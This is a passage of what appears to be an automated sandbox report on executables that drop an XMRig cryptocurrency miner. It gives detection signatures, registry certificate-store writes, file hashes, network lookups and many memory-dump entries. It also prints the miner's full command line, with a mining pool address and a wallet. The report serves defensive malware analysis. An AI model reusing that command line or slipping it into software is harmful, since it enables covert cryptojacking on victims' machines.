memory/3964-29-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-30-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-31-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-32-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-33-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-34-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-35-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-36-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-37-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-38-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-39-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-40-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-41-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-42-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-43-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-44-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-45-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-46-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-47-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-48-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-49-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-50-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-51-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-52-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-53-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-54-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-55-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-56-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-57-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-58-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-59-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-60-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-61-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-62-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-63-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-64-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-65-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-66-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-67-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-68-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-69-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-70-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-71-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-72-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-73-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-74-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-75-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-76-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-77-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-78-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-79-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-80-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-81-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-82-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-83-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-84-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 22:10

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 107.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 168.253.116.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/1104-16-0x0000020139EE0000-0x0000020139F00000-memory.dmp

memory/1104-17-0x0000020139F30000-0x0000020139F50000-memory.dmp

memory/1104-18-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-21-0x0000020139F70000-0x0000020139F90000-memory.dmp

memory/1104-20-0x0000020139F50000-0x0000020139F70000-memory.dmp

memory/1104-19-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-22-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-23-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-25-0x0000020139F70000-0x0000020139F90000-memory.dmp

memory/1104-24-0x0000020139F50000-0x0000020139F70000-memory.dmp

memory/1104-26-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-27-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-28-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-29-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-30-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-31-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-32-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-33-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-34-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-35-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-36-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-37-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-38-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-39-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-40-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-41-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-42-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-43-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-44-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-45-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-46-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-47-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-48-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-49-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-50-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-51-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-52-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-53-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-54-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-55-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-56-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-57-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-58-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-59-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-60-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-61-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-62-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-63-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-64-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-65-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-66-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-67-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-68-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-69-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-70-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-71-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-72-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-73-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-74-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-75-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-76-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-77-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-78-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-79-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-80-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-81-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-82-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-83-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

memory/1104-84-0x00007FF6A2DD0000-0x00007FF6A38D3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:50

Platform

win10v2004-20240426-en

Max time kernel

1792s

Max time network

1796s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc902030100